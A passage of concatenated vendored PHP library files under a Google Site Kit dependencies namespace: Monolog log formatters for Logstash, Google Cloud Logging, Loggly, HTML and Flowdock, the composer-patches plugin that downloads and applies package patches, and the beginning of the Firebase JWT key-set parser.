$this->type; return $record; } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Formatter; /** * Serializes a log message to Logstash Event Format * * @see https://www.elastic.co/products/logstash * @see https://github.com/elastic/logstash/blob/master/logstash-core/src/main/java/org/logstash/Event.java * * @author Tim Mower <timothy.mower@gmail.com> */ class LogstashFormatter extends \Google\Site_Kit_Dependencies\Monolog\Formatter\NormalizerFormatter { /** * @var string the name of the system for the Logstash log message, used to fill the @source field */ protected $systemName; /** * @var string an application name for the Logstash log message, used to fill the @type field */ protected $applicationName; /** * @var string the key for 'extra' fields from the Monolog record */ protected $extraKey; /** * @var string the key for 'context' fields from the Monolog record */ protected $contextKey; /** * @param string $applicationName The application that sends the data, used as the "type" field of logstash * @param string|null $systemName The system/machine name, used as the "source" field of logstash, defaults to the hostname of the machine * @param string $extraKey The key for extra keys inside logstash "fields", defaults to extra * @param string $contextKey The key for context keys inside logstash "fields", defaults to context */ public function __construct(string $applicationName, ?string $systemName = null, string $extraKey = 'extra', string $contextKey = 'context') { // logstash requires a ISO 8601 format date with optional millisecond precision. parent::__construct('Y-m-d\\TH:i:s.uP'); $this->systemName = $systemName === null ? (string) \gethostname() : $systemName; $this->applicationName = $applicationName; $this->extraKey = $extraKey; $this->contextKey = $contextKey; } /** * {@inheritDoc} */ public function format(array $record) : string { $record = parent::format($record); if (empty($record['datetime'])) { $record['datetime'] = \gmdate('c'); } $message = ['@timestamp' => $record['datetime'], '@version' => 1, 'host' => $this->systemName]; if (isset($record['message'])) { $message['message'] = $record['message']; } if (isset($record['channel'])) { $message['type'] = $record['channel']; $message['channel'] = $record['channel']; } if (isset($record['level_name'])) { $message['level'] = $record['level_name']; } if (isset($record['level'])) { $message['monolog_level'] = $record['level']; } if ($this->applicationName) { $message['type'] = $this->applicationName; } if (!empty($record['extra'])) { $message[$this->extraKey] = $record['extra']; } if (!empty($record['context'])) { $message[$this->contextKey] = $record['context']; } return $this->toJson($message) . "\n"; } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Formatter; use DateTimeInterface; use Google\Site_Kit_Dependencies\Monolog\LogRecord; /** * Encodes message information into JSON in a format compatible with Cloud logging. * * @see https://cloud.google.com/logging/docs/structured-logging * @see https://cloud.google.com/logging/docs/reference/v2/rest/v2/LogEntry * * @author Luís Cobucci <lcobucci@gmail.com> */ final class GoogleCloudLoggingFormatter extends \Google\Site_Kit_Dependencies\Monolog\Formatter\JsonFormatter { /** {@inheritdoc} **/ public function format(array $record) : string { // Re-key level for GCP logging $record['severity'] = $record['level_name']; $record['time'] = $record['datetime']->format(\DateTimeInterface::RFC3339_EXTENDED); // Remove keys that are not used by GCP unset($record['level'], $record['level_name'], $record['datetime']); return parent::format($record); } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Formatter; /** * Encodes message information into JSON in a format compatible with Loggly. * * @author Adam Pancutt <adam@pancutt.com> */ class LogglyFormatter extends \Google\Site_Kit_Dependencies\Monolog\Formatter\JsonFormatter { /** * Overrides the default batch mode to new lines for compatibility with the * Loggly bulk API. */ public function __construct(int $batchMode = self::BATCH_MODE_NEWLINES, bool $appendNewline = \false) { parent::__construct($batchMode, $appendNewline); } /** * Appends the 'timestamp' parameter for indexing by Loggly. * * @see https://www.loggly.com/docs/automated-parsing/#json * @see \Monolog\Formatter\JsonFormatter::format() */ public function format(array $record) : string { if (isset($record["datetime"]) && $record["datetime"] instanceof \DateTimeInterface) { $record["timestamp"] = $record["datetime"]->format("Y-m-d\\TH:i:s.uO"); unset($record["datetime"]); } return parent::format($record); } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Formatter; use Google\Site_Kit_Dependencies\Monolog\Logger; use Google\Site_Kit_Dependencies\Monolog\Utils; /** * Formats incoming records into an HTML table * * This is especially useful for html email logging * * @author Tiago Brito <tlfbrito@gmail.com> */ class HtmlFormatter extends \Google\Site_Kit_Dependencies\Monolog\Formatter\NormalizerFormatter { /** * Translates Monolog log levels to html color priorities. * * @var array<int, string> */ protected $logLevels = [\Google\Site_Kit_Dependencies\Monolog\Logger::DEBUG => '#CCCCCC', \Google\Site_Kit_Dependencies\Monolog\Logger::INFO => '#28A745', \Google\Site_Kit_Dependencies\Monolog\Logger::NOTICE => '#17A2B8', \Google\Site_Kit_Dependencies\Monolog\Logger::WARNING => '#FFC107', \Google\Site_Kit_Dependencies\Monolog\Logger::ERROR => '#FD7E14', \Google\Site_Kit_Dependencies\Monolog\Logger::CRITICAL => '#DC3545', \Google\Site_Kit_Dependencies\Monolog\Logger::ALERT => '#821722', \Google\Site_Kit_Dependencies\Monolog\Logger::EMERGENCY => '#000000']; /** * @param string|null $dateFormat The format of the timestamp: one supported by DateTime::format */ public function __construct(?string $dateFormat = null) { parent::__construct($dateFormat); } /** * Creates an HTML table row * * @param string $th Row header content * @param string $td Row standard cell content * @param bool $escapeTd false if td content must not be html escaped */ protected function addRow(string $th, string $td = ' ', bool $escapeTd = \true) : string { $th = \htmlspecialchars($th, \ENT_NOQUOTES, 'UTF-8'); if ($escapeTd) { $td = '<pre>' . \htmlspecialchars($td, \ENT_NOQUOTES, 'UTF-8') . '</pre>'; } return "<tr style=\"padding: 4px;text-align: left;\">\n<th style=\"vertical-align: top;background: #ccc;color: #000\" width=\"100\">{$th}:</th>\n<td style=\"padding: 4px;text-align: left;vertical-align: top;background: #eee;color: #000\">" . $td . "</td>\n</tr>"; } /** * Create a HTML h1 tag * * @param string $title Text to be in the h1 * @param int $level Error level * @return string */ protected function addTitle(string $title, int $level) : string { $title = \htmlspecialchars($title, \ENT_NOQUOTES, 'UTF-8'); return '<h1 style="background: ' . $this->logLevels[$level] . ';color: #ffffff;padding: 5px;" class="monolog-output">' . $title . '</h1>'; } /** * Formats a log record. * * @return string The formatted record */ public function format(array $record) : string { $output = $this->addTitle($record['level_name'], $record['level']); $output .= '<table cellspacing="1" width="100%" class="monolog-output">'; $output .= $this->addRow('Message', (string) $record['message']); $output .= $this->addRow('Time', $this->formatDate($record['datetime'])); $output .= $this->addRow('Channel', $record['channel']); if ($record['context']) { $embeddedTable = '<table cellspacing="1" width="100%">'; foreach ($record['context'] as $key => $value) { $embeddedTable .= $this->addRow((string) $key, $this->convertToString($value)); } $embeddedTable .= '</table>'; $output .= $this->addRow('Context', $embeddedTable, \false); } if ($record['extra']) { $embeddedTable = '<table cellspacing="1" width="100%">'; foreach ($record['extra'] as $key => $value) { $embeddedTable .= $this->addRow((string) $key, $this->convertToString($value)); } $embeddedTable .= '</table>'; $output .= $this->addRow('Extra', $embeddedTable, \false); } return $output . '</table>'; } /** * Formats a set of log records. * * @return string The formatted set of records */ public function formatBatch(array $records) : string { $message = ''; foreach ($records as $record) { $message .= $this->format($record); } return $message; } /** * @param mixed $data */ protected function convertToString($data) : string { if (null === $data || \is_scalar($data)) { return (string) $data; } $data = $this->normalize($data); return \Google\Site_Kit_Dependencies\Monolog\Utils::jsonEncode($data, \JSON_PRETTY_PRINT | \Google\Site_Kit_Dependencies\Monolog\Utils::DEFAULT_JSON_FLAGS, \true); } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Formatter; /** * formats the record to be used in the FlowdockHandler * * @author Dominik Liebler <liebler.dominik@gmail.com> * @deprecated Since 2.9.0 and 3.3.0, Flowdock was shutdown we will thus drop this handler in Monolog 4 */ class FlowdockFormatter implements \Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface { /** * @var string */ private $source; /** * @var string */ private $sourceEmail; public function __construct(string $source, string $sourceEmail) { $this->source = $source; $this->sourceEmail = $sourceEmail; } /** * {@inheritDoc} * * @return mixed[] */ public function format(array $record) : array { $tags = ['#logs', '#' . \strtolower($record['level_name']), '#' . $record['channel']]; foreach ($record['extra'] as $value) { $tags[] = '#' . $value; } $subject = \sprintf('in %s: %s - %s', $this->source, $record['level_name'], $this->getShortMessage($record['message'])); $record['flowdock'] = ['source' => $this->source, 'from_address' => $this->sourceEmail, 'subject' => $subject, 'content' => $record['message'], 'tags' => $tags, 'project' => $this->source]; return $record; } /** * {@inheritDoc} * * @return mixed[][] */ public function formatBatch(array $records) : array { $formatted = []; foreach ($records as $record) { $formatted[] = $this->format($record); } return $formatted; } public function getShortMessage(string $message) : string { static $hasMbString; if (null === $hasMbString) { $hasMbString = \function_exists('mb_strlen'); } $maxLength = 45; if ($hasMbString) { if (\mb_strlen($message, 'UTF-8') > $maxLength) { $message = \mb_substr($message, 0, $maxLength - 4, 'UTF-8') . ' ...'; } } else { if (\strlen($message) > $maxLength) { $message = \substr($message, 0, $maxLength - 4) . ' ...'; } } return $message; } } <?php /** * @file * Provides a way to patch Composer packages after installation. */ namespace Google\Site_Kit_Dependencies\cweagans\Composer; use Google\Site_Kit_Dependencies\Composer\Composer; use Google\Site_Kit_Dependencies\Composer\DependencyResolver\Operation\InstallOperation; use Google\Site_Kit_Dependencies\Composer\DependencyResolver\Operation\UninstallOperation; use Google\Site_Kit_Dependencies\Composer\DependencyResolver\Operation\UpdateOperation; use Google\Site_Kit_Dependencies\Composer\DependencyResolver\Operation\OperationInterface; use Google\Site_Kit_Dependencies\Composer\EventDispatcher\EventSubscriberInterface; use Google\Site_Kit_Dependencies\Composer\IO\IOInterface; use Google\Site_Kit_Dependencies\Composer\Package\AliasPackage; use Google\Site_Kit_Dependencies\Composer\Package\PackageInterface; use Google\Site_Kit_Dependencies\Composer\Plugin\PluginInterface; use Google\Site_Kit_Dependencies\Composer\Installer\PackageEvents; use Google\Site_Kit_Dependencies\Composer\Script\Event; use Google\Site_Kit_Dependencies\Composer\Script\ScriptEvents; use Google\Site_Kit_Dependencies\Composer\Installer\PackageEvent; use Google\Site_Kit_Dependencies\Composer\Util\ProcessExecutor; use Google\Site_Kit_Dependencies\Composer\Util\RemoteFilesystem; use Google\Site_Kit_Dependencies\Symfony\Component\Process\Process; class Patches implements \Google\Site_Kit_Dependencies\Composer\Plugin\PluginInterface, \Google\Site_Kit_Dependencies\Composer\EventDispatcher\EventSubscriberInterface { /** * @var Composer $composer */ protected $composer; /** * @var IOInterface $io */ protected $io; /** * @var EventDispatcher $eventDispatcher */ protected $eventDispatcher; /** * @var ProcessExecutor $executor */ protected $executor; /** * @var array $patches */ protected $patches; /** * @var array $installedPatches */ protected $installedPatches; /** * Apply plugin modifications to composer * * @param Composer $composer * @param IOInterface $io */ public function activate(\Google\Site_Kit_Dependencies\Composer\Composer $composer, \Google\Site_Kit_Dependencies\Composer\IO\IOInterface $io) { $this->composer = $composer; $this->io = $io; $this->eventDispatcher = $composer->getEventDispatcher(); $this->executor = new \Google\Site_Kit_Dependencies\Composer\Util\ProcessExecutor($this->io); $this->patches = array(); $this->installedPatches = array(); } /** * Returns an array of event names this subscriber wants to listen to. */ public static function getSubscribedEvents() { return array( \Google\Site_Kit_Dependencies\Composer\Script\ScriptEvents::PRE_INSTALL_CMD => array('checkPatches'), \Google\Site_Kit_Dependencies\Composer\Script\ScriptEvents::PRE_UPDATE_CMD => array('checkPatches'), \Google\Site_Kit_Dependencies\Composer\Installer\PackageEvents::PRE_PACKAGE_INSTALL => array('gatherPatches'), \Google\Site_Kit_Dependencies\Composer\Installer\PackageEvents::PRE_PACKAGE_UPDATE => array('gatherPatches'), // The following is a higher weight for compatibility with // https://github.com/AydinHassan/magento-core-composer-installer and more generally for compatibility with // every Composer plugin which deploys downloaded packages to other locations. // In such cases you want that those plugins deploy patched files so they have to run after // the "composer-patches" plugin. // @see: https://github.com/cweagans/composer-patches/pull/153 \Google\Site_Kit_Dependencies\Composer\Installer\PackageEvents::POST_PACKAGE_INSTALL => array('postInstall', 10), \Google\Site_Kit_Dependencies\Composer\Installer\PackageEvents::POST_PACKAGE_UPDATE => array('postInstall', 10), ); } /** * Before running composer install, * @param Event $event */ public function checkPatches(\Google\Site_Kit_Dependencies\Composer\Script\Event $event) { if (!$this->isPatchingEnabled()) { return; } try { $repositoryManager = $this->composer->getRepositoryManager(); $localRepository = $repositoryManager->getLocalRepository(); $installationManager = $this->composer->getInstallationManager(); $packages = $localRepository->getPackages(); $extra = $this->composer->getPackage()->getExtra(); $patches_ignore = isset($extra['patches-ignore']) ? $extra['patches-ignore'] : array(); $tmp_patches = $this->grabPatches(); foreach ($packages as $package) { $extra = $package->getExtra(); if (isset($extra['patches'])) { if (isset($patches_ignore[$package->getName()])) { foreach ($patches_ignore[$package->getName()] as $package_name => $patches) { if (isset($extra['patches'][$package_name])) { $extra['patches'][$package_name] = \array_diff($extra['patches'][$package_name], $patches); } } } $this->installedPatches[$package->getName()] = $extra['patches']; } $patches = isset($extra['patches']) ? $extra['patches'] : array(); $tmp_patches = $this->arrayMergeRecursiveDistinct($tmp_patches, $patches); } if ($tmp_patches == FALSE) { $this->io->write('<info>No patches supplied.</info>'); return; } // Remove packages for which the patch set has changed. $promises = array(); foreach ($packages as $package) { if (!$package instanceof \Google\Site_Kit_Dependencies\Composer\Package\AliasPackage) { $package_name = $package->getName(); $extra = $package->getExtra(); $has_patches = isset($tmp_patches[$package_name]); $has_applied_patches = isset($extra['patches_applied']) && \count($extra['patches_applied']) > 0; if ($has_patches && !$has_applied_patches || !$has_patches && $has_applied_patches || $has_patches && $has_applied_patches && $tmp_patches[$package_name] !== $extra['patches_applied']) { $uninstallOperation = new \Google\Site_Kit_Dependencies\Composer\DependencyResolver\Operation\UninstallOperation($package, 'Removing package so it can be re-installed and re-patched.'); $this->io->write('<info>Removing package ' . $package_name . ' so that it can be re-installed and re-patched.</info>'); $promises[] = $installationManager->uninstall($localRepository, $uninstallOperation); } } } $promises = \array_filter($promises); if ($promises) { $this->composer->getLoop()->wait($promises); } } catch (\LogicException $e) { return; } } /** * Gather patches from dependencies and store them for later use. * * @param PackageEvent $event */ public function gatherPatches(\Google\Site_Kit_Dependencies\Composer\Installer\PackageEvent $event) { // If we've already done this, then don't do it again. if (isset($this->patches['_patchesGathered'])) { $this->io->write('<info>Patches already gathered. Skipping</info>', TRUE, \Google\Site_Kit_Dependencies\Composer\IO\IOInterface::VERBOSE); return; } elseif (!$this->isPatchingEnabled()) { $this->io->write('<info>Patching is disabled. Skipping.</info>', TRUE, \Google\Site_Kit_Dependencies\Composer\IO\IOInterface::VERBOSE); return; } $this->patches = $this->grabPatches(); if (empty($this->patches)) { $this->io->write('<info>No patches supplied.</info>'); } $extra = $this->composer->getPackage()->getExtra(); $patches_ignore = isset($extra['patches-ignore']) ? $extra['patches-ignore'] : array(); // Now add all the patches from dependencies that will be installed. $operations = $event->getOperations(); $this->io->write('<info>Gathering patches for dependencies. This might take a minute.</info>'); foreach ($operations as $operation) { if ($operation instanceof \Google\Site_Kit_Dependencies\Composer\DependencyResolver\Operation\InstallOperation || $operation instanceof \Google\Site_Kit_Dependencies\Composer\DependencyResolver\Operation\UpdateOperation) { $package = $this->getPackageFromOperation($operation); $extra = $package->getExtra(); if (isset($extra['patches'])) { if (isset($patches_ignore[$package->getName()])) { foreach ($patches_ignore[$package->getName()] as $package_name => $patches) { if (isset($extra['patches'][$package_name])) { $extra['patches'][$package_name] = \array_diff($extra['patches'][$package_name], $patches); } } } $this->patches = $this->arrayMergeRecursiveDistinct($this->patches, $extra['patches']); } // Unset installed patches for this package if (isset($this->installedPatches[$package->getName()])) { unset($this->installedPatches[$package->getName()]); } } } // Merge installed patches from dependencies that did not receive an update. foreach ($this->installedPatches as $patches) { $this->patches = $this->arrayMergeRecursiveDistinct($this->patches, $patches); } // If we're in verbose mode, list the projects we're going to patch. if ($this->io->isVerbose()) { foreach ($this->patches as $package => $patches) { $number = \count($patches); $this->io->write('<info>Found ' . $number . ' patches for ' . $package . '.</info>'); } } // Make sure we don't gather patches again. Extra keys in $this->patches // won't hurt anything, so we'll just stash it there. $this->patches['_patchesGathered'] = TRUE; } /** * Get the patches from root composer or external file * @return Patches * @throws \Exception */ public function grabPatches() { // First, try to get the patches from the root composer.json. $extra = $this->composer->getPackage()->getExtra(); if (isset($extra['patches'])) { $this->io->write('<info>Gathering patches for root package.</info>'); $patches = $extra['patches']; return $patches; } elseif (isset($extra['patches-file'])) { $this->io->write('<info>Gathering patches from patch file.</info>'); $patches = \file_get_contents($extra['patches-file']); $patches = \json_decode($patches, TRUE); $error = \json_last_error(); if ($error != 0) { switch ($error) { case \JSON_ERROR_DEPTH: $msg = ' - Maximum stack depth exceeded'; break; case \JSON_ERROR_STATE_MISMATCH: $msg = ' - Underflow or the modes mismatch'; break; case \JSON_ERROR_CTRL_CHAR: $msg = ' - Unexpected control character found'; break; case \JSON_ERROR_SYNTAX: $msg = ' - Syntax error, malformed JSON'; break; case \JSON_ERROR_UTF8: $msg = ' - Malformed UTF-8 characters, possibly incorrectly encoded'; break; default: $msg = ' - Unknown error'; break; } throw new \Exception('There was an error in the supplied patches file:' . $msg); } if (isset($patches['patches'])) { $patches = $patches['patches']; return $patches; } elseif (!$patches) { throw new \Exception('There was an error in the supplied patch file'); } } else { return array(); } } /** * @param PackageEvent $event * @throws \Exception */ public function postInstall(\Google\Site_Kit_Dependencies\Composer\Installer\PackageEvent $event) { // Check if we should exit in failure. $extra = $this->composer->getPackage()->getExtra(); $exitOnFailure = \getenv('COMPOSER_EXIT_ON_PATCH_FAILURE') || !empty($extra['composer-exit-on-patch-failure']); $skipReporting = \getenv('COMPOSER_PATCHES_SKIP_REPORTING') || !empty($extra['composer-patches-skip-reporting']); // Get the package object for the current operation. $operation = $event->getOperation(); /** @var PackageInterface $package */ $package = $this->getPackageFromOperation($operation); $package_name = $package->getName(); if (!isset($this->patches[$package_name])) { if ($this->io->isVerbose()) { $this->io->write('<info>No patches found for ' . $package_name . '.</info>'); } return; } $this->io->write(' - Applying patches for <info>' . $package_name . '</info>'); // Get the install path from the package object. $manager = $event->getComposer()->getInstallationManager(); $install_path = $manager->getInstaller($package->getType())->getInstallPath($package); // Set up a downloader. $downloader = new \Google\Site_Kit_Dependencies\Composer\Util\RemoteFilesystem($this->io, $this->composer->getConfig()); // Track applied patches in the package info in installed.json $localRepository = $this->composer->getRepositoryManager()->getLocalRepository(); $localPackage = $localRepository->findPackage($package_name, $package->getVersion()); $extra = $localPackage->getExtra(); $extra['patches_applied'] = array(); foreach ($this->patches[$package_name] as $description => $url) { $this->io->write(' <info>' . $url . '</info> (<comment>' . $description . '</comment>)'); try { $this->eventDispatcher->dispatch(NULL, new \Google\Site_Kit_Dependencies\cweagans\Composer\PatchEvent(\Google\Site_Kit_Dependencies\cweagans\Composer\PatchEvents::PRE_PATCH_APPLY, $package, $url, $description)); $this->getAndApplyPatch($downloader, $install_path, $url, $package); $this->eventDispatcher->dispatch(NULL, new \Google\Site_Kit_Dependencies\cweagans\Composer\PatchEvent(\Google\Site_Kit_Dependencies\cweagans\Composer\PatchEvents::POST_PATCH_APPLY, $package, $url, $description)); $extra['patches_applied'][$description] = $url; } catch (\Exception $e) { $this->io->write(' <error>Could not apply patch! Skipping. The error was: ' . $e->getMessage() . '</error>'); if ($exitOnFailure) { throw new \Exception("Cannot apply patch {$description} ({$url})!"); } } } $localPackage->setExtra($extra); $this->io->write(''); if (\true !== $skipReporting) { $this->writePatchReport($this->patches[$package_name], $install_path); } } /** * Get a Package object from an OperationInterface object. * * @param OperationInterface $operation * @return PackageInterface * @throws \Exception */ protected function getPackageFromOperation(\Google\Site_Kit_Dependencies\Composer\DependencyResolver\Operation\OperationInterface $operation) { if ($operation instanceof \Google\Site_Kit_Dependencies\Composer\DependencyResolver\Operation\InstallOperation) { $package = $operation->getPackage(); } elseif ($operation instanceof \Google\Site_Kit_Dependencies\Composer\DependencyResolver\Operation\UpdateOperation) { $package = $operation->getTargetPackage(); } else { throw new \Exception('Unknown operation: ' . \get_class($operation)); } return $package; } /** * Apply a patch on code in the specified directory. * * @param RemoteFilesystem $downloader * @param $install_path * @param $patch_url * @param PackageInterface $package * @throws \Exception */ protected function getAndApplyPatch(\Google\Site_Kit_Dependencies\Composer\Util\RemoteFilesystem $downloader, $install_path, $patch_url, \Google\Site_Kit_Dependencies\Composer\Package\PackageInterface $package) { // Local patch file. if (\file_exists($patch_url)) { $filename = \realpath($patch_url); } else { // Generate random (but not cryptographically so) filename. $filename = \uniqid(\sys_get_temp_dir() . '/') . ".patch"; // Download file from remote filesystem to this location. $hostname = \parse_url($patch_url, \PHP_URL_HOST); try { $downloader->copy($hostname, $patch_url, $filename, \false); } catch (\Exception $e) { // In case of an exception, retry once as the download might // have failed due to intermittent network issues. $downloader->copy($hostname, $patch_url, $filename, \false); } } // The order here is intentional. p1 is most likely to apply with git apply. // p0 is next likely. p2 is extremely unlikely, but for some special cases, // it might be useful. p4 is useful for Magento 2 patches $patch_levels = array('-p1', '-p0', '-p2', '-p4'); // Check for specified patch level for this package. $extra = $this->composer->getPackage()->getExtra(); if (!empty($extra['patchLevel'][$package->getName()])) { $patch_levels = array($extra['patchLevel'][$package->getName()]); } // Attempt to apply with git apply. $patched = $this->applyPatchWithGit($install_path, $patch_levels, $filename); // In some rare cases, git will fail to apply a patch, fallback to using // the 'patch' command. if (!$patched) { foreach ($patch_levels as $patch_level) { // --no-backup-if-mismatch here is a hack that fixes some // differences between how patch works on windows and unix. if ($patched = $this->executeCommand("patch %s --no-backup-if-mismatch -d %s < %s", $patch_level, $install_path, $filename)) { break; } } } // Clean up the temporary patch file. if (isset($hostname)) { \unlink($filename); } // If the patch *still* isn't applied, then give up and throw an Exception. // Otherwise, let the user know it worked. if (!$patched) { throw new \Exception("Cannot apply patch {$patch_url}"); } } /** * Checks if the root package enables patching. * * @return bool * Whether patching is enabled. Defaults to TRUE. */ protected function isPatchingEnabled() { $extra = $this->composer->getPackage()->getExtra(); if (empty($extra['patches']) && empty($extra['patches-ignore']) && !isset($extra['patches-file'])) { // The root package has no patches of its own, so only allow patching if // it has specifically opted in. return isset($extra['enable-patching']) ? $extra['enable-patching'] : FALSE; } else { return TRUE; } } /** * Writes a patch report to the target directory. * * @param array $patches * @param string $directory */ protected function writePatchReport($patches, $directory) { $output = "This file was automatically generated by Composer Patches (https://github.com/cweagans/composer-patches)\n"; $output .= "Patches applied to this directory:\n\n"; foreach ($patches as $description => $url) { $output .= $description . "\n"; $output .= 'Source: ' . $url . "\n\n\n"; } \file_put_contents($directory . "/PATCHES.txt", $output); } /** * Executes a shell command with escaping. * * @param string $cmd * @return bool */ protected function executeCommand($cmd) { // Shell-escape all arguments except the command. $args = \func_get_args(); foreach ($args as $index => $arg) { if ($index !== 0) { $args[$index] = \escapeshellarg($arg); } } // And replace the arguments. $command = \call_user_func_array('sprintf', $args); $output = ''; if ($this->io->isVerbose()) { $this->io->write('<comment>' . $command . '</comment>'); $io = $this->io; $output = function ($type, $data) use($io) { if ($type == \Google\Site_Kit_Dependencies\Symfony\Component\Process\Process::ERR) { $io->write('<error>' . $data . '</error>'); } else { $io->write('<comment>' . $data . '</comment>'); } }; } return $this->executor->execute($command, $output) == 0; } /** * Recursively merge arrays without changing data types of values. * * Does not change the data types of the values in the arrays. Matching keys' * values in the second array overwrite those in the first array, as is the * case with array_merge. * * @param array $array1 * The first array. * @param array $array2 * The second array. * @return array * The merged array. * * @see http://php.net/manual/en/function.array-merge-recursive.php#92195 */ protected function arrayMergeRecursiveDistinct(array $array1, array $array2) { $merged = $array1; foreach ($array2 as $key => &$value) { if (\is_array($value) && isset($merged[$key]) && \is_array($merged[$key])) { $merged[$key] = $this->arrayMergeRecursiveDistinct($merged[$key], $value); } else { $merged[$key] = $value; } } return $merged; } /** * Attempts to apply a patch with git apply. * * @param $install_path * @param $patch_levels * @param $filename * * @return bool * TRUE if patch was applied, FALSE otherwise. */ protected function applyPatchWithGit($install_path, $patch_levels, $filename) { // Do not use git apply unless the install path is itself a git repo // @see https://stackoverflow.com/a/27283285 if (!\is_dir($install_path . '/.git')) { return FALSE; } $patched = FALSE; foreach ($patch_levels as $patch_level) { if ($this->io->isVerbose()) { $comment = 'Testing ability to patch with git apply.'; $comment .= ' This command may produce errors that can be safely ignored.'; $this->io->write('<comment>' . $comment . '</comment>'); } $checked = $this->executeCommand('git -C %s apply --check -v %s %s', $install_path, $patch_level, $filename); $output = $this->executor->getErrorOutput(); if (\substr($output, 0, 7) == 'Skipped') { // Git will indicate success but silently skip patches in some scenarios. // // @see https://github.com/cweagans/composer-patches/pull/165 $checked = FALSE; } if ($checked) { // Apply the first successful style. $patched = $this->executeCommand('git -C %s apply %s %s', $install_path, $patch_level, $filename); break; } } return $patched; } /** * Indicates if a package has been patched. * * @param \Composer\Package\PackageInterface $package * The package to check. * * @return bool * TRUE if the package has been patched. */ public static function isPackagePatched(\Google\Site_Kit_Dependencies\Composer\Package\PackageInterface $package) { return \array_key_exists('patches_applied', $package->getExtra()); } /** * {@inheritDoc} */ public function deactivate(\Google\Site_Kit_Dependencies\Composer\Composer $composer, \Google\Site_Kit_Dependencies\Composer\IO\IOInterface $io) { } /** * {@inheritDoc} */ public function uninstall(\Google\Site_Kit_Dependencies\Composer\Composer $composer, \Google\Site_Kit_Dependencies\Composer\IO\IOInterface $io) { } } <?php /** * @file * Dispatch events when patches are applied. */ namespace Google\Site_Kit_Dependencies\cweagans\Composer; class PatchEvents { /** * The PRE_PATCH_APPLY event occurs before a patch is applied. * * The event listener method receives a cweagans\Composer\PatchEvent instance. * * @var string */ const PRE_PATCH_APPLY = 'pre-patch-apply'; /** * The POST_PATCH_APPLY event occurs after a patch is applied. * * The event listener method receives a cweagans\Composer\PatchEvent instance. * * @var string */ const POST_PATCH_APPLY = 'post-patch-apply'; } <?php /** * @file * Dispatch events when patches are applied. */ namespace Google\Site_Kit_Dependencies\cweagans\Composer; use Google\Site_Kit_Dependencies\Composer\EventDispatcher\Event; use Google\Site_Kit_Dependencies\Composer\Package\PackageInterface; class PatchEvent extends \Google\Site_Kit_Dependencies\Composer\EventDispatcher\Event { /** * @var PackageInterface $package */ protected $package; /** * @var string $url */ protected $url; /** * @var string $description */ protected $description; /** * Constructs a PatchEvent object. * * @param string $eventName * @param PackageInterface $package * @param string $url * @param string $description */ public function __construct($eventName, \Google\Site_Kit_Dependencies\Composer\Package\PackageInterface $package, $url, $description) { parent::__construct($eventName); $this->package = $package; $this->url = $url; $this->description = $description; } /** * Returns the package that is patched. * * @return PackageInterface */ public function getPackage() { return $this->package; } /** * Returns the url of the patch. * * @return string */ public function getUrl() { return $this->url; } /** * Returns the description of the patch. * * @return string */ public function getDescription() { return $this->description; } } <?php namespace Google\Site_Kit_Dependencies\Firebase\JWT; use DomainException; use InvalidArgumentException; use UnexpectedValueException; /** * JSON Web Key implementation, based on this spec: * https://tools.ietf.org/html/draft-ietf-jose-json-web-key-41 * * PHP version 5 * * @category Authentication * @package Authentication_JWT * @author Bui Sy Nguyen <nguyenbs@gmail.com> * @license http://opensource.org/licenses/BSD-3-Clause 3-clause BSD * @link https://github.com/firebase/php-jwt */ class JWK { private const OID = '1.2.840.10045.2.1'; private const ASN1_OBJECT_IDENTIFIER = 0x6; private const ASN1_SEQUENCE = 0x10; // also defined in JWT private const ASN1_BIT_STRING = 0x3; private const EC_CURVES = [ 'P-256' => '1.2.840.10045.3.1.7', // Len: 64 'secp256k1' => '1.3.132.0.10', // Len: 64 'P-384' => '1.3.132.0.34', ]; // For keys with "kty" equal to "OKP" (Octet Key Pair), the "crv" parameter must contain the key subtype. // This library supports the following subtypes: private const OKP_SUBTYPES = ['Ed25519' => \true]; /** * Parse a set of JWK keys * * @param array<mixed> $jwks The JSON Web Key Set as an associative array * @param string $defaultAlg The algorithm for the Key object if "alg" is not set in the * JSON Web Key Set * * @return array<string, Key> An associative array of key IDs (kid) to Key objects * * @throws InvalidArgumentException Provided JWK Set is empty * @throws UnexpectedValueException Provided JWK Set was invalid * @throws DomainException OpenSSL failure * * @uses parseKey */ public static function parseKeySet(array $jwks, string $defaultAlg = null) : array { $keys = []; if (!isset($jwks['keys'])) { throw new \UnexpectedValueException('"keys" member must exist in the JWK Set'); } if (empty($jwks['keys'])) { throw new \InvalidArgumentException('JWK Set did not contain any keys'); } foreach ($jwks['keys'] as $k => $v) { $kid = isset($v['kid']) ? $v['kid'] : $k; if ($key = self::parseKey($v, $defaultAlg)) { $keys[(string) $kid] = $key; } } if (0 === \count($keys)) { throw new \UnexpectedValueException('No supported algorithms found in JWK Set'); } return $keys; } /** * Parse a JWK key * * @param array<mixed> $jwk An individual JWK * @param string $defaultAlg The algorithm for the Key object if "alg" is not set in the * JSON Web Key Set * * @return Key The key object for the JWK * * @throws InvalidArgumentException Provided JWK is empty * @throws UnexpectedValueException Provided JWK was invalid * @throws DomainException OpenSSL failure * * @uses createPemFromModulusAndExponent */ public static function parseKey(array $jwk, string $defaultAlg = null) : ?\Google\Site_Kit_Dependencies\Firebase\JWT\Key { if (empty($jwk)) { throw new \InvalidArgumentException('JWK must not be empty'); } if (!isset($jwk['kty'])) { throw new \UnexpectedValueException('JWK must contain a "kty" parameter'); } if (!isset($jwk['alg'])) { if (\is_null($defaultAlg)) { 